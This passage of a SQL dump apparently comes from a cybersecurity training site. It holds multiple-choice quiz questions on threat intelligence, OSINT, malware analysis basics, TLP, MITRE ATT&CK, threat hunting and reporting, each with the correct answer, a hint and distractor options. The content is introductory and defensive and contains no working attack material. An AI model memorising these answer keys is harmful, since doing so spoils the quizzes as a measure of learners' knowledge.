(6990, 768, 'In the Intelligence Cycle, what happens during \"Dissemination\"?', 6, 'Intelligence is delivered to consumers', 0, 'Sharing the finished product.', '2025-12-29 13:30:45', '[\"Data is encrypted\", \"Intelligence is delivered to consumers\", \"Data is collected\", \"Requirements are set\"]'),
(6991, 768, 'Why is \"Direction\" the first phase?', 7, 'To define requirements so we know what to look for', 0, 'You need a goal before you start collecting.', '2025-12-29 13:30:45', '[\"To save time\", \"To define requirements so we know what to look for\", \"It is the easiest\", \"Collection is actually first\"]'),
(6992, 768, 'Which is an example of \"Operational\" Intelligence?', 8, 'Report on APT28\'s phishing methods', 0, 'Focuses on Actor behaviors and campaigns.', '2025-12-29 13:30:45', '[\"Hash: abc12345\", \"Global cybercrime cost report\", \"Report on APT28\'s phishing methods\", \"A firewall log\"]'),
(6993, 768, 'What is \"Data\"?', 9, 'Raw, unprocessed facts', 0, 'The base of the pyramid.', '2025-12-29 13:30:45', '[\"Analyzed insight\", \"Raw, unprocessed facts\", \"Contextualized info\", \"A report\"]'),
(6994, 768, 'Feedback helps to...', 10, 'Close the loop and improve the next cycle', 0, 'Continuous improvement.', '2025-12-29 13:30:45', '[\"Close the loop and improve the next cycle\", \"Delete data\", \"Stop the cycle\", \"Archive logs\"]'),
(6995, 769, 'What defines OSINT?', 1, 'Data from publicly available sources', 0, 'Open Source = Public.', '2025-12-29 13:30:45', '[\"Hacking servers\", \"Data from publicly available sources\", \"Spying on private emails\", \"Inside knowledge\"]'),
(6996, 769, 'Which is an example of Passive Reconnaissance?', 2, 'Searching Google for the company name', 0, 'Passive means no direct contact with the target systems.', '2025-12-29 13:30:45', '[\"Port scanning the target\", \"Trying to login\", \"Searching Google for the company name\", \"Sending a phishing email\"]'),
(6997, 769, 'What is a \"Sock Puppet\"?', 3, 'A fake online identity used for research', 0, 'Used to protect your real identity during investigations.', '2025-12-29 13:30:45', '[\"A type of malware\", \"A fake online identity used for research\", \"A VPN provider\", \"A hacking tool\"]'),
(6998, 770, 'Which DNS record shows the IP address of a domain?', 1, 'A', 0, 'A record maps Name to IPv4.', '2025-12-29 13:30:45', '[\"MX\", \"A\", \"TXT\", \"NS\"]'),
(6999, 770, 'What is the best source for finding subdomains via SSL certificates?', 2, 'Certificate Transparency Logs (crt.sh)', 0, 'CT logs serve as a permanent record of all issued certificates.', '2025-12-29 13:30:45', '[\"WHOIS\", \"Certificate Transparency Logs (crt.sh)\", \"Ping\", \"Traceroute\"]'),
(7000, 770, 'Why check MX records?', 3, 'To see who handles their email (e.g., Google vs Microsoft)', 0, 'Mail Exchanger records point to the mail server.', '2025-12-29 13:30:45', '[\"To find the website IP\", \"To see who handles their email (e.g., Google vs Microsoft)\", \"To find employee passwords\", \"To see browsing history\"]'),
(7001, 771, 'What is the danger of interacting with threat actors on Telegram?', 1, 'It ruins OPSEC and can be illegal', 0, 'Passive observation is the rule.', '2025-12-29 13:30:45', '[\"You might make friends\", \"It ruins OPSEC and can be illegal\", \"They will ban you\", \"It costs money\"]'),
(7002, 771, 'What is \"Sherlock\" used for?', 2, 'Username enumeration across platforms', 0, 'Finds where else a username exists.', '2025-12-29 13:30:45', '[\"Password cracking\", \"Username enumeration across platforms\", \"WiFi hacking\", \"Decryption\"]'),
(7003, 771, 'Which platform is best for finding corporate hierarchy and tech stacks?', 3, 'LinkedIn', 0, 'The professional network.', '2025-12-29 13:30:45', '[\"TikTok\", \"LinkedIn\", \"Snapchat\", \"Pinterest\"]'),
(7004, 772, 'Which Google Dork finds PDF files?', 1, 'filetype:pdf', 0, 'Standard Google operator.', '2025-12-29 13:30:45', '[\"filetype:pdf\", \"ext:pdf\", \"search:pdf\", \"pdf:yes\"]'),
(7005, 772, 'What does Shodan crawl?', 2, 'Devices and Ports', 0, 'The search engine for the Internet of Things.', '2025-12-29 13:30:45', '[\"Web pages\", \"Devices and Ports\", \"Social Media\", \"Emails\"]'),
(7006, 772, 'Maltego is primarily used for...', 3, 'Visual Link Analysis', 0, 'Graph-based visualization.', '2025-12-29 13:30:45', '[\"Brute forcing\", \"Visual Link Analysis\", \"Coding\", \"Firewalling\"]'),
(7007, 773, 'What does OPSEC stand for?', 1, 'Operational Security', 0, 'Protecting your operations.', '2025-12-29 13:30:45', '[\"Open Security\", \"Operational Security\", \"Optional Security\", \"Operation Secrecy\"]'),
(7008, 773, 'Passive Reconnaissance involves...', 2, 'No direct contact with the target', 0, 'staying invisible.', '2025-12-29 13:30:45', '[\"Touching the target\", \"No direct contact with the target\", \"Hacking the target\", \"Asking the target questions\"]'),
(7009, 773, 'A \"Sock Puppet\" should...', 3, 'Have a realistic backstory and no link to you', 0, 'To blend in.', '2025-12-29 13:30:45', '[\"Be linked to your real identity\", \"Have a realistic backstory and no link to you\", \"Be an empty profile\", \"Use your work email\"]'),
(7010, 773, 'Which DNS record helps map Email infrastructure?', 4, 'MX', 0, 'Mail Exchanger.', '2025-12-29 13:30:45', '[\"A\", \"MX\", \"CNAME\", \"PTR\"]'),
(7011, 773, 'Which tool archives historical versions of websites?', 5, 'Wayback Machine', 0, 'Archive.org.', '2025-12-29 13:30:45', '[\"Shodan\", \"Wayback Machine\", \"Nmap\", \"Wireshark\"]'),
(7012, 773, 'What is \"Google Dorking\"?', 6, 'Using advanced search operators to find sensitive info', 0, 'Advanced search queries.', '2025-12-29 13:30:45', '[\"Hacking Google servers\", \"Using advanced search operators to find sensitive info\", \"Creating fake Google accounts\", \"Deleting Google results\"]'),
(7013, 773, 'Shodan is best for finding...', 7, 'Webcams, Servers, and IoT devices', 0, 'Internet connected hardware.', '2025-12-29 13:30:45', '[\"People\", \"Webcams, Servers, and IoT devices\", \"News articles\", \"Credit cards\"]'),
(7014, 773, 'Why search \"Certificate Transparency\" logs?', 8, 'To discover subdomains', 0, 'Certs reveal hostnames.', '2025-12-29 13:30:45', '[\"To find passwords\", \"To discover subdomains\", \"To update SSL\", \"To hide traffic\"]'),
(7015, 773, 'What information does WHOIS provide?', 9, 'Domain ownership and registration data', 0, 'Registrar info.', '2025-12-29 13:30:45', '[\"Domain ownership and registration data\", \"Website source code\", \"Database passwords\", \"User traffic\"]'),
(7016, 773, 'Which platform is most useful for corporate reconnaissance (employees, jobs)?', 10, 'LinkedIn', 0, 'Professional context.', '2025-12-29 13:30:45', '[\"Instagram\", \"LinkedIn\", \"Twitch\", \"Snapchat\"]'),
(7017, 774, 'What is Static Analysis?', 1, 'Analyzing the file without execution', 0, 'Looking at the code/properties at rest.', '2025-12-29 13:38:32', '[\"Running the malware\", \"Analyzing the file without execution\", \"Deleting the file\", \"Updating antivirus\"]'),
(7018, 774, 'Which tool captures network traffic during Dynamic Analysis?', 2, 'Wireshark', 0, 'Packet analyzer.', '2025-12-29 13:38:32', '[\"Wireshark\", \"Notepad\", \"Calculator\", \"Zip\"]'),
(7019, 774, 'Why use a Sandbox?', 3, 'To isolate the malware so it doesn\'t infect the host', 0, 'Safety first.', '2025-12-29 13:38:32', '[\"To play with sand\", \"To isolate the malware so it doesn\'t infect the host\", \"To make the computer faster\", \"To encrypt the virus\"]'),
(7020, 775, 'Does changing one byte in a file change its Hash?', 1, 'Yes, completely', 0, 'Avalanche effect.', '2025-12-29 13:38:32', '[\"Yes, completely\", \"No\", \"Only if it is a large file\", \"Maybe\"]'),
(7021, 775, 'What is a \"PDB Path\"?', 2, 'A debug path left by the compiler showing the attacker\'s folder structure', 0, 'Program Database path.', '2025-12-29 13:38:32', '[\"A database path\", \"A debug path left by the compiler showing the attacker\'s folder structure\", \"A public domain\", \"A protocol\"]'),
(7022, 775, 'If you see very few strings in a binary, it is likely...', 3, 'Packed or Obfuscated', 0, 'Packing hides text.', '2025-12-29 13:38:32', '[\"Clean\", \"Packed or Obfuscated\", \"Empty\", \"A text file\"]'),
(7023, 776, 'What is the safest way to analyze a suspicious file initially?', 1, 'Static Analysis', 0, 'No execution = Minimum risk.', '2025-12-29 13:38:32', '[\"Double click it\", \"Static Analysis\", \"Dynamic Analysis on your host\", \"Email it to a friend\"]'),
(7024, 776, 'Which hash algorithm is currently the industry standard for IOCs?', 2, 'SHA256', 0, 'Secure Hash Algorithm 256-bit.', '2025-12-29 13:38:32', '[\"MD5\", \"SHA256\", \"CRC32\", \"ROT13\"]'),
(7025, 776, 'What is a \"Sandbox\"?', 3, 'An isolated environment for safely running malware', 0, 'Isolation is key.', '2025-12-29 13:38:32', '[\"A playground\", \"An isolated environment for safely running malware\", \"A hacking tool\", \"A firewall\"]'),
(7026, 776, 'Dynamic Analysis observes...', 4, 'File behavior at runtime (Registry, Network, File system)', 0, 'Behavioral analysis.', '2025-12-29 13:38:32', '[\"Code structure\", \"File behavior at runtime (Registry, Network, File system)\", \"File size only\", \"Author name\"]'),
(7027, 776, 'If a file is \"Packed\", what must happen before it runs?', 5, 'It must unpack itself in memory', 0, 'Decompression/Decryption.', '2025-12-29 13:38:32', '[\"It must be deleted\", \"It must unpack itself in memory\", \"It must be compiled\", \"It must hold still\"]'),
(7028, 776, 'Which tool extracts readable text from a binary?', 6, 'strings', 0, 'The strings command.', '2025-12-29 13:38:32', '[\"strings\", \"grep\", \"cat\", \"ls\"]'),
(7029, 776, 'What does C2 stand for?', 7, 'Command & Control', 0, 'The server managing the botnet.', '2025-12-29 13:38:32', '[\"Command & Control\", \"Cool & Calm\", \"Computer 2\", \"Cyber Command\"]'),
(7030, 776, 'Why check a file hash on VirusTotal?', 8, 'To see if other vendors have already detected it', 0, 'Community intelligence.', '2025-12-29 13:38:32', '[\"To download the virus\", \"To see if other vendors have already detected it\", \"To delete the internet\", \"To hack Google\"]'),
(7031, 776, 'Pestudio is primarily used for...', 9, 'Static Analysis', 0, 'Analyzing PE headers/strings.', '2025-12-29 13:38:32', '[\"Dynamic Analysis\", \"Static Analysis\", \"Writing Reports\", \"Chatting\"]'),
(7032, 776, 'Ransomware typically does what?', 10, 'Encrypts files and demands payment', 0, 'Encryption for extortion.', '2025-12-29 13:38:32', '[\"Encrypts files and demands payment\", \"Steals passwords\", \"Mines crypto\", \"Shows ads\"]'),
(7033, 777, 'Which is an example of an IOC?', 1, 'A known malicious file hash', 0, 'Static evidence.', '2025-12-29 13:38:32', '[\"High CPU usage\", \"A known malicious file hash\", \"Slow network\", \"A user logging in\"]'),
(7034, 777, 'Which indicator focuses on \"Behavior\" and \"Intent\"?', 2, 'IOA', 0, 'Indicator of Attack.', '2025-12-29 13:38:32', '[\"IOC\", \"IOA\", \"URL\", \"IP\"]'),
(7035, 777, 'Which is harder for an attacker to change?', 3, 'Their Behavior/Tactics (IOA)', 0, 'Changing TTPs requires retraining.', '2025-12-29 13:38:32', '[\"Their IP address\", \"Their File Hash\", \"Their Behavior/Tactics (IOA)\", \"Their Domain\"]'),
(7036, 778, 'Can you verify TLP:RED intel with a third party?', 1, 'No - never', 0, 'Verified only with source.', '2025-12-29 13:38:32', '[\"Yes\", \"No - never\", \"Only if you trust them\", \"Maybe\"]'),
(7037, 778, 'Which TLP level allows sharing with the general public?', 2, 'CLEAR', 0, 'White/Clear = Public.', '2025-12-29 13:38:32', '[\"CLEAR\", \"GREEN\", \"AMBER\", \"RED\"]'),
(7038, 778, 'TLP:AMBER allows sharing with...', 3, 'Your organization and clients on need-to-know basis', 0, 'Restricted distribution.', '2025-12-29 13:38:32', '[\"The internet\", \"Your organization and clients on need-to-know basis\", \"Only 1 person\", \"Anyone\"]'),
(7039, 779, 'What does STIX stand for?', 1, 'Structured Threat Information Expression', 0, 'Standard language for CTI.', '2025-12-29 13:38:32', '[\"Structured Threat Information Expression\", \"Standard Text Info X\", \"Secure Threat Intel Xchange\", \"Simple Text Index\"]'),
(7040, 779, 'What is TAXII?', 2, 'The transport mechanism for STIX', 0, 'Trusted Automated Exchange of Intelligence Information.', '2025-12-29 13:38:32', '[\"The transport mechanism for STIX\", \"A cab service\", \"A file format\", \"A virus\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(7041, 779, 'Which is an IOC?', 3, '192.168.1.1 (C2 IP)', 0, 'Artifact.', '2025-12-29 13:38:32', '[\"192.168.1.1 (C2 IP)\", \"Port Scanning Activity\", \"Pass the Hash Attack\", \"Phishing Methodology\"]'),
(7042, 779, 'Which is an IOA?', 4, 'Cred Dumping from LSASS', 0, 'Behavior.', '2025-12-29 13:38:32', '[\"File Hash\", \"Cred Dumping from LSASS\", \"Domain Name\", \"Email Subject\"]'),
(7043, 779, 'TLP:RED means...', 5, 'Not for disclosure, restricted to specific recipients', 0, 'Most restrictive.', '2025-12-29 13:38:32', '[\"Share with everyone\", \"Share with community\", \"Not for disclosure, restricted to specific recipients\", \"Share with Org\"]'),
(7044, 779, 'If you receive TLP:GREEN info, can you post it on Twitter?', 6, 'No', 0, 'Twitter = Public (CLEAR). Green is Community.', '2025-12-29 13:38:32', '[\"Yes\", \"No\", \"Only if anonymous\", \"If its cool\"]'),
(7045, 779, 'Why use Standards like STIX?', 7, 'To allow automated machine-to-machine sharing', 0, 'Interoperability.', '2025-12-29 13:38:32', '[\"To make things complicated\", \"To allow automated machine-to-machine sharing\", \"To encrypt data\", \"To hide info\"]'),
(7046, 779, 'David Bianco\'s Pyramid of Pain places what at the top (Hardest for attacker)?', 8, 'TTPs (Tactics, Techniques, Procedures)', 0, 'Behavior is hardest to change.', '2025-12-29 13:38:32', '[\"Hash Values\", \"IP Addresses\", \"TTPs (Tactics, Techniques, Procedures)\", \"Domain Names\"]'),
(7047, 779, 'Who manages the TLP standard?', 9, 'FIRST.org', 0, 'Forum of Incident Response and Security Teams.', '2025-12-29 13:38:32', '[\"FIRST.org\", \"Google\", \"Microsoft\", \"Nobody\"]'),
(7048, 779, 'An IP Address in the Pyramid of Pain is...', 10, 'Easy to change (Low Pain)', 0, 'Attacker just rents a new VPS.', '2025-12-29 13:38:32', '[\"Easy to change (Low Pain)\", \"Impossible to change\", \"Tough\", \"Annoying\"]'),
(7049, 780, 'In MITRE ATT&CK, \"Initial Access\" is a...', 1, 'Tactic (Goal)', 0, 'The \'Why\'.', '2025-12-29 13:38:32', '[\"Tactic (Goal)\", \"Technique (Method)\", \"Procedure\", \"Tool\"]'),
(7050, 780, 'In MITRE ATT&CK, \"Spearphishing Attachment\" is a...', 2, 'Technique', 0, 'The \'How\'.', '2025-12-29 13:38:32', '[\"Tactic\", \"Technique\", \"Procedure\", \"Matrix\"]'),
(7051, 780, 'What does the matrix help defenders do?', 3, 'Map defenses against real-world threats', 0, 'Gap analysis.', '2025-12-29 13:38:32', '[\"Map defenses against real-world threats\", \"Install virus\", \"Hack back\", \"Guess passwords\"]'),
(7052, 781, 'What is the Navigator used for?', 1, 'Visualizing/Heatmapping the matrix', 0, 'Annotating layers.', '2025-12-29 13:38:32', '[\"Visualizing/Heatmapping the matrix\", \"Browsing the web\", \"GPS\", \"Chatting\"]'),
(7053, 781, 'If you color techniques used by Ransomware red, you are doing...', 2, 'Threat Modeling / Emulation Planning', 0, 'Visualizing the adversary.', '2025-12-29 13:38:32', '[\"Threat Modeling / Emulation Planning\", \"Defensive Coverage\", \"Coding\", \"Patching\"]'),
(7054, 781, 'Where can you access Navigator?', 3, 'Github / MITRE Website', 0, 'It is an open web app.', '2025-12-29 13:38:32', '[\"Github / MITRE Website\", \"Dark Web\", \"Only offline\", \"App Store\"]'),
(7055, 782, 'What is a \"Tactic\" in ATT&CK?', 1, 'The adversary\'s technical goal (The Why)', 0, 'High level objective.', '2025-12-29 13:38:32', '[\"The adversary\'s technical goal (The Why)\", \"The specific command\", \"The tool used\", \"The IP address\"]'),
(7056, 782, 'What is a \"Technique\"?', 2, 'How the goal is achieved', 0, 'The method.', '2025-12-29 13:38:32', '[\"How the goal is achieved\", \"The goal itself\", \"The date of attack\", \"The victim\"]'),
(7057, 782, '\"Persistence\" is an example of...', 3, 'Tactic', 0, 'Staying in the system.', '2025-12-29 13:38:32', '[\"Tactic\", \"Technique\", \"Software\", \"Actor\"]'),
(7058, 782, '\"Registry Run Keys\" is an example of...', 4, 'Technique', 0, 'A way to achieve Persistence.', '2025-12-29 13:38:32', '[\"Technique\", \"Tactic\", \"Procedure\", \"MITRE\"]'),
(7059, 782, 'What is \"Sub-Technique\"?', 5, 'A more specific implementation of a technique', 0, 'e.g., T1059.001 (PowerShell) under Command Scripting.', '2025-12-29 13:38:32', '[\"A more specific implementation of a technique\", \"A smaller tactic\", \"A tool\", \"A user\"]'),
(7060, 782, 'Why is Mapping to MITRE important?', 6, 'It provides a common language for defenders and red teams', 0, 'Standardization.', '2025-12-29 13:38:32', '[\"It provides a common language for defenders and red teams\", \"It is fun\", \"It is required for windows updates\", \"It prevents all hacks\"]'),
(7061, 782, 'Who maintains ATT&CK?', 7, 'MITRE Corp', 0, 'Federally Funded R&D Center.', '2025-12-29 13:38:32', '[\"MITRE Corp\", \"Microsoft\", \"Google\", \"FBI\"]'),
(7062, 782, 'What does the \"Enterprise\" matrix cover?', 8, 'Windows, Linux, macOS, Cloud networks', 0, 'Standard IT networks.', '2025-12-29 13:38:32', '[\"Windows, Linux, macOS, Cloud networks\", \"Mobile phones only\", \"Satellites\", \"Cars\"]'),
(7063, 782, 'Can Navigator export layers?', 9, 'Yes, as JSON or SVG', 0, 'For sharing.', '2025-12-29 13:38:32', '[\"Yes, as JSON or SVG\", \"No\", \"Only PDF\", \"Only PNG\"]'),
(7064, 782, 'ATT&CK is based on...', 10, 'Real-world observations', 0, 'Evidence based.', '2025-12-29 13:38:32', '[\"Real-world observations\", \"Theoretical hacks\", \"Sci-fi movies\", \"Random guesses\"]'),
(7065, 783, 'What is the primary difference between SOC and Threat Hunting?', 1, 'SOC is Reactive, Hunting is Proactive', 0, 'Alerts vs Search.', '2025-12-29 13:38:32', '[\"SOC is Reactive, Hunting is Proactive\", \"SOC works at night\", \"Hunting uses guns\", \"No difference\"]'),
(7066, 783, 'What does \"Assume Breach\" mean?', 2, 'Assume the network is compromised and look for evidence', 0, 'Proactive stance.', '2025-12-29 13:38:32', '[\"Assume the network is compromised and look for evidence\", \"Breach the network yourself\", \"Assume security is perfect\", \"Give up\"]'),
(7067, 783, 'What metric does Hunting aim to reduce?', 3, 'Dwell Time', 0, 'Time undetected.', '2025-12-29 13:38:32', '[\"Dwell Time\", \"Cost\", \"False Positives\", \"Ping\"]'),
(7068, 784, 'In \"Stacking\", where is the malicious activity usually found?', 1, 'The Long Tail (Least Frequent)', 0, 'Malware is the anomaly.', '2025-12-29 13:38:32', '[\"The Long Tail (Least Frequent)\", \"The Short Stack (Most Frequent)\", \"The Middle\", \"Everywhere\"]'),
(7069, 784, 'What is \"Stacking\" also known as?', 2, 'Frequency Analysis', 0, 'Counting stats.', '2025-12-29 13:38:32', '[\"Frequency Analysis\", \"Stack Overflow\", \"Heap Spray\", \"Sorting\"]'),
(7070, 784, 'Clustering helps to...', 3, 'Identify outliers by grouping similar items', 0, 'Finding the odd one out.', '2025-12-29 13:38:32', '[\"Identify outliers by grouping similar items\", \"Encrypt data\", \"Delete logs\", \"Generate alerts\"]'),
(7071, 785, 'Defining a Hypothesis is the first step of...', 1, 'A Structured Hunt', 0, 'Hypothesis-Driven Hunting.', '2025-12-29 13:38:32', '[\"A Structured Hunt\", \"Incident Response\", \"Malware Analysis\", \"Patching\"]'),
(7072, 785, 'Which is a valid Hypothesis?', 2, 'APT29 uses PowerShell for lateral movement', 0, 'Specific and testable proposition.', '2025-12-29 13:38:32', '[\"APT29 uses PowerShell for lateral movement\", \"I will find bad stuff\", \"PowerShell is bad\", \"Updates are essential\"]'),
(7073, 785, 'If you stack \"User Agents\", which one is fast investigation?', 3, 'Python-urllib/2.7 (Count: 1)', 0, 'Low count + suspicious string = Priority.', '2025-12-29 13:38:32', '[\"Mozilla/5.0 (Windows NT 10.0)... (Count: 5000)\", \"Python-urllib/2.7 (Count: 1)\", \"Chrome/90 (Count: 4000)\", \"Edge/89 (Count: 2000)\"]'),
(7074, 785, 'What separates Hunting from Incident Response?', 4, 'Hunting looks for unknown threats; IR handles known incidents', 0, 'Discovery vs Reaction.', '2025-12-29 13:38:32', '[\"Hunting looks for unknown threats; IR handles known incidents\", \"Hunting is faster\", \"IR is cheaper\", \"Hunting is automated\"]'),
(7075, 785, 'The \"Baseline\" is...', 5, 'Known Good behavior', 0, 'You need to know what is Normal to find what is Abnormal.', '2025-12-29 13:38:32', '[\"Known Good behavior\", \"Known Bad behavior\", \"A firewall rule\", \"A password\"]'),
(7076, 785, 'What is a \"Pivot\"?', 6, 'Moving from one data point to another related one', 0, 'e.g., Domain -> IP -> Other Domains.', '2025-12-29 13:38:32', '[\"Moving from one data point to another related one\", \"Turning around\", \"Deleting a row\", \"Closing a ticket\"]'),
(7077, 785, 'Checking for \"Beaconing\" traffic is analyzing...', 7, 'Regular interval communications (Heartbeats)', 0, 'C2 callbacks.', '2025-12-29 13:38:32', '[\"Regular interval communications (Heartbeats)\", \"Large file downloads\", \"SQL Injection\", \"Password failures\"]'),
(7078, 785, 'Least Frequency Analysis is effective for finding...', 8, 'Rare events', 0, 'Outliers.', '2025-12-29 13:38:32', '[\"Rare events\", \"Common events\", \"System files\", \"Updates\"]'),
(7079, 785, 'A \"Hunt\" should always result in...', 9, 'Ideally a detection rule or improved visibility', 0, 'Improving the security posture regardless of finding a breach.', '2025-12-29 13:38:32', '[\"Ideally a detection rule or improved visibility\", \"A verified breach\", \"Firing someone\", \"Installing an antivirus\"]'),
(7080, 785, 'Assume Breach implies...', 10, 'Defenses can fail', 0, 'Accepting risk.', '2025-12-29 13:38:32', '[\"Defenses can fail\", \"Defenses act perfectly\", \"Hackers are lazy\", \"Firewalls stop everything\"]'),
(7081, 786, 'What involves confirming multiple feeds reporting the same indicator?', 1, 'Deduplication/Correlation', 0, 'Merging duplicates.', '2025-12-29 13:38:32', '[\"Deduplication/Correlation\", \"Encryption\", \"Deletion\", \"Scanning\"]'),
(7082, 786, 'Why \"Enrich\" an indicator?', 2, 'To add context (e.g., GeoIP, ASM Info, Rep Score)', 0, 'Context aids decision making.', '2025-12-29 13:38:32', '[\"To add context (e.g., GeoIP, ASM Info, Rep Score)\", \"To make it expensive\", \"To encrypt it\", \"To hide it\"]'),
(7083, 786, 'Pushing IOCs to a SIEM is part of...', 3, 'Integration / Dissemination', 0, 'Actioning the intel.', '2025-12-29 13:38:32', '[\"Integration / Dissemination\", \"Collection\", \"Planning\", \"Analysis\"]'),
(7084, 787, 'In MISP, what represents a \"Threat Actor\" or \"Mitre Technique\"?', 1, 'Galaxy / Tag', 0, 'Contextual metadata.', '2025-12-29 13:38:32', '[\"Galaxy / Tag\", \"Attribute\", \"Event\", \"User\"]'),
(7085, 787, 'The top-level container in MISP is an...', 2, 'Event', 0, 'Events contain attributes.', '2025-12-29 13:38:32', '[\"Event\", \"Attribute\", \"Object\", \"Server\"]'),
(7086, 787, 'MISP allows you to...', 3, 'Share and Sync intelligence with other organizations', 0, 'Community sharing.', '2025-12-29 13:38:32', '[\"Share and Sync intelligence with other organizations\", \"Scan viruses\", \"Hack websites\", \"Manage passwords\"]'),
(7087, 788, 'Which is a popular Graph-based TIP?', 1, 'OpenCTI', 0, 'Knowledge Graph platform.', '2025-12-29 13:38:32', '[\"OpenCTI\", \"Notepad++\", \"Calculator\", \"Outlook\"]'),
(7088, 788, 'What is the benefit of a Knowledge Graph (OpenCTI)?', 2, 'Visualizing complex relationships between entities', 0, 'Graph theory.', '2025-12-29 13:38:32', '[\"Visualizing complex relationships between entities\", \"Saving disk space\", \"Faster typing\", \"Cheaper hosting\"]'),
(7089, 788, 'Why \"Normalize\" data in a TIP?', 3, 'To store diverse feeds in a consistent format', 0, 'Standardization.', '2025-12-29 13:38:32', '[\"To store diverse feeds in a consistent format\", \"To delete it\", \"To encrypt it\", \"To hide source\"]'),
(7090, 788, 'If you have zero budget, which TIP is best?', 4, 'MISP (Open Source)', 0, 'Free and open source.', '2025-12-29 13:38:32', '[\"MISP (Open Source)\", \"Splunk Enterprise\", \"Recorded Future\", \"CrowdStrike\"]'),
(7091, 788, 'What is an \"IoC Decay\" or \"Expiration\"?', 5, 'Retiring an indicator when it is no longer malicious', 0, 'Lifecycle management.', '2025-12-29 13:38:32', '[\"Retiring an indicator when it is no longer malicious\", \"Deleting files\", \"Password expiry\", \"Server crash\"]'),
(7092, 788, 'Enrichment Connectors typically query...', 6, 'External APIs (VirusTotal, AlienVault)', 0, 'Third party data.', '2025-12-29 13:38:32', '[\"External APIs (VirusTotal, AlienVault)\", \"Local files\", \"Printers\", \"Keyboards\"]'),
(7093, 788, 'Sharing an Event in MISP creates a...', 7, 'Distributed warning to the community', 0, 'Collective defense.', '2025-12-29 13:38:32', '[\"Distributed warning to the community\", \"Security breach\", \"Firewall rule\", \"False positive\"]'),
(7094, 788, 'Can a TIP automate firewall blocking?', 8, 'Yes, via integration/orchestration', 0, 'SOAR capabilities.', '2025-12-29 13:38:32', '[\"Yes, via integration/orchestration\", \"No, never\", \"Only if manual\", \"Only on Tuesdays\"]'),
(7095, 788, 'Attributes in MISP can be marked as...', 9, 'to_ids (Actionable for IDS)', 0, 'Flag indicating if it should be exported to security controls.', '2025-12-29 13:38:32', '[\"to_ids (Actionable for IDS)\", \"Private\", \"Deleted\", \"Fun\"]'),
(7096, 788, 'STIX 2.0 uses what format?', 10, 'JSON', 0, 'Modern standard.', '2025-12-29 13:38:32', '[\"JSON\", \"XML\", \"CSV\", \"Binary\"]'),
(7097, 789, 'What is BLUF?', 1, 'Bottom Line Up Front', 0, 'Conclusion first.', '2025-12-29 13:38:32', '[\"Bottom Line Up Front\", \"Blue Light\", \"Bottom Left\", \"Big Line\"]'),
(7098, 789, 'Who is the audience for a \"Strategic\" report?', 2, 'Executives', 0, 'Decision makers.', '2025-12-29 13:38:32', '[\"Executives\", \"SOC Analysts\", \"Engineers\", \"Hackers\"]'),
(7099, 789, 'Why use \"Estimative Language\"?', 3, 'To standardize uncertainty and confidence', 0, 'Clarity of probability.', '2025-12-29 13:38:32', '[\"To standardize uncertainty and confidence\", \"To sound smart\", \"To confuse people\", \"To avoid liability\"]'),
(7100, 790, 'Which statement uses proper Estimative Language?', 1, 'It is LIKELY that APT29 is responsible', 0, 'Standard term.', '2025-12-29 13:38:32', '[\"It is LIKELY that APT29 is responsible\", \"Maybe it is APT29\", \"I believe it is APT29\", \"It is 100% APT29\"]'),
(7101, 790, 'Strategic Reports should focus on...', 2, 'Business Risk and Impact', 0, 'Executive view.', '2025-12-29 13:38:32', '[\"Business Risk and Impact\", \"IP Addresses\", \"Malware code\", \"Logs\"]'),
(7102, 790, 'Tactical Reports should focus on...', 3, 'Actionable IOCs and Rules', 0, 'Defender view.', '2025-12-29 13:38:32', '[\"Actionable IOCs and Rules\", \"Financial loss\", \"Geopolitics\", \"Trends\"]'),
(7103, 790, 'What is \"Words of Estimative Probability\" (WEP)?', 4, 'Standard terms to convey likelihood', 0, 'Intelligence standard.', '2025-12-29 13:38:32', '[\"Standard terms to convey likelihood\", \"A spell check tool\", \"A thesaurus\", \"A translation\"]'),
(7104, 790, 'A report with 50 pages of technical details should usually include...', 5, 'An Executive Summary (BLUF)', 0, 'For the busy reader.', '2025-12-29 13:38:32', '[\"An Executive Summary (BLUF)\", \"A poem\", \"No summary\", \"Pictures of cats\"]'),
(7105, 790, 'Dissemination via API is best for...', 6, 'Speed and Automation', 0, 'Machine consumption.', '2025-12-29 13:38:32', '[\"Speed and Automation\", \"Executives\", \"Legal Reviews\", \"Press Releases\"]'),
(7106, 790, 'Feedback in the intel cycle ensures...', 7, 'Relevance and Improvement', 0, 'Quality control.', '2025-12-29 13:38:32', '[\"Relevance and Improvement\", \"Payment\", \"Deletion\", \"Encryption\"]'),
(7107, 790, 'If you have Low Confidence, you should...', 8, 'State it clearly', 0, 'Honesty in analysis.', '2025-12-29 13:38:32', '[\"State it clearly\", \"Lie\", \"Say High Confidence\", \"Say nothing\"]'),
(7108, 790, 'Intelligence Requirements (IRs) drive the...', 9, 'Entire Intelligence Cycle', 0, 'The starting point.', '2025-12-29 13:38:32', '[\"Entire Intelligence Cycle\", \"Lunch menu\", \"Server updates\", \"HR policy\"]'),
(7109, 790, 'Which is NOT a goal of reporting?', 10, 'To confuse the reader', 0, 'Clarity is King.', '2025-12-29 13:38:32', '[\"To confuse the reader\", \"To inform decisions\", \"To warn of threats\", \"To document findings\"]');

-- --------------------------------------------------------

--
-- Table structure for table `modules`
--

DROP TABLE IF EXISTS `modules`;
CREATE TABLE `modules` (
  `id` int(11) NOT NULL,
  `learning_path_id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `estimated_hours` int(11) DEFAULT 0,
  `display_order` int(11) DEFAULT 0,
  `prerequisite_module_id` int(11) DEFAULT NULL,
  `is_active` tinyint(1) DEFAULT 1,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `modules`
--

INSERT INTO `modules` (`id`, `learning_path_id`, `title`, `description`, `estimated_hours`, `display_order`, `prerequisite_module_id`, `is_active`, `created_at`, `updated_at`) VALUES
(1, 1, 'Introduction to Cybersecurity', 'Learn what cybersecurity is, why it matters, and explore career paths in the field.', 15, 1, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
(2, 1, 'Linux Fundamentals', 'Master the Linux command line, file permissions, and basic system administration.', 25, 2, NULL, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'),
